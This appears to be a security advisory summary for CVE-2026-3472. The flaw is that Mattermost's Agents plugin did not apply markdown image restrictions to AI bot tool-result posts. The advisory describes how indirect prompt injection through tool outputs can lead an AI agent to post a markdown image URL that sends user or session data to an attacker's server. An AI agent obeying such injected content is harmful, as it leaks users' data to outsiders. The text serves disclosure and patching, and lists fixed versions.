What happened
CVE-2026-3472 (CVSS 3.5 Low) published 2026-06-26. Mattermost applies markdown image rendering restrictions to normal posts but not to AI bot tool-result posts. An attacker who can inject content into tool results (e.g., via prompt injection of an AI agent that posts results to Mattermost) can exfiltrate data to an external server. Patched in same versions as CVE-2026-4339.
Why it matters
This is a concrete prompt-injection-to-data-exfiltration chain: a user who tricks an AI agent (via indirect prompt injection from tool outputs) into including a markdown image URL in its Mattermost response achieves out-of-band data exfiltration from the collaboration platform — demonstrating how AI agent output channels become attack surfaces.
Attack vector
Mattermost fails to properly apply markdown image rendering restrictions to AI bot tool-result posts. An authenticated attacker injects markdown image syntax (e.g., ``) into tool result posts, causing the Mattermost client to render the image and send an HTTP request to an attacker-controlled server, leaking user/session context.
Affected systems
Mattermost 10.11.x ≤ 10.11.18, 11.5.x ≤ 11.5.6, 11.6.x ≤ 11.6.3 (Agents plugin AI bot tool result posts)
Mitigation
Upgrade to Mattermost 10.11.19 / 11.5.7 / 11.6.4. Advisory: https://mattermost.com/security-updates